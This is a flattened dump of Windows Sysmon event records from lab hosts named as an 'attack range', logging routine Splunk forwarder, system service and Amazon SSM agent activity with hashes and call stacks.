Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1297-6216-3D05-000000003802}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:19.393{C8EA50B7-1297-6216-3D05-000000003802}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:20.928{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50E9A4E700596FA984CE7CAC55F3BB99,SHA256=86A5CC307BCEB6DDA09A3F5D7205F04C3640A6634DB29BB35E836BA13F3D0775,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.910{C8EA50B7-1298-6216-3F05-000000003802}65766612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.741{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FA0BCDD0CE7367FA11C29772CE92898,SHA256=0C69E0ED49C75EEC02ADD7A404D65C71D0165C5B55DDDF93BE27D8F5E27D7A05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.538{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1298-6216-3F05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.522{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1298-6216-3F05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.522{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.522{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.522{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.522{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.522{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1298-6216-3F05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.524{C8EA50B7-1298-6216-3F05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:20.470{C8EA50B7-1297-6216-3E05-000000003802}65366584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.748{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=383E73AD792EBC9F7B4FF9BE248F7B03,SHA256=10C4B7DE8E1A524AB2A1BB7D3B6F7AADED3C60007C796AF029E493FE3737A999,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.042{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1299-6216-4005-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.026{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1299-6216-4005-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.026{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.026{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1299-6216-4005-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:21.029{C8EA50B7-1299-6216-4005-000000003802}6636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:22.778{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14FFEA8A141948F4C15F2AF71D8B4627,SHA256=79BDA2CC13BF6750AB62A3FC2437235CB23AF1667139822C890DB404ACEAA83F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:22.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB3837450AE339304B33451DA5585EDF,SHA256=5DD5A9FB0BDE9210A3C2EA460013A4F65E422D74B134F48A4376BBAD6016141D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:23.780{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3040DFB27CAB1F41ABE1D647FFA092F9,SHA256=D297171DEB3210BB092C215B8D994530A21BB9DF5967E85CCA54D4DB406401C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:23.099{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87A966529485AFF5ED6F8611E4EAB2E4,SHA256=0E59902E63D8904C75B16F869DEB4B41541B5A9094277CA15F6EB167FFC74FE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:23.072{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-138MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:24.796{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80137BEDBA692A970753E92E6FBC10AD,SHA256=F5A8A0B16569B036CF8082326AF31553055A7FF8EEFB4734A5496C04D6483DE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:24.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F192E388786308F3557C0D22AA9660,SHA256=3B728923D487989489E3F84BD72928D382888D834A8289BCD725A02B69EE32B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:22.683{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53543-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:24.067{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-139MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:25.964{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 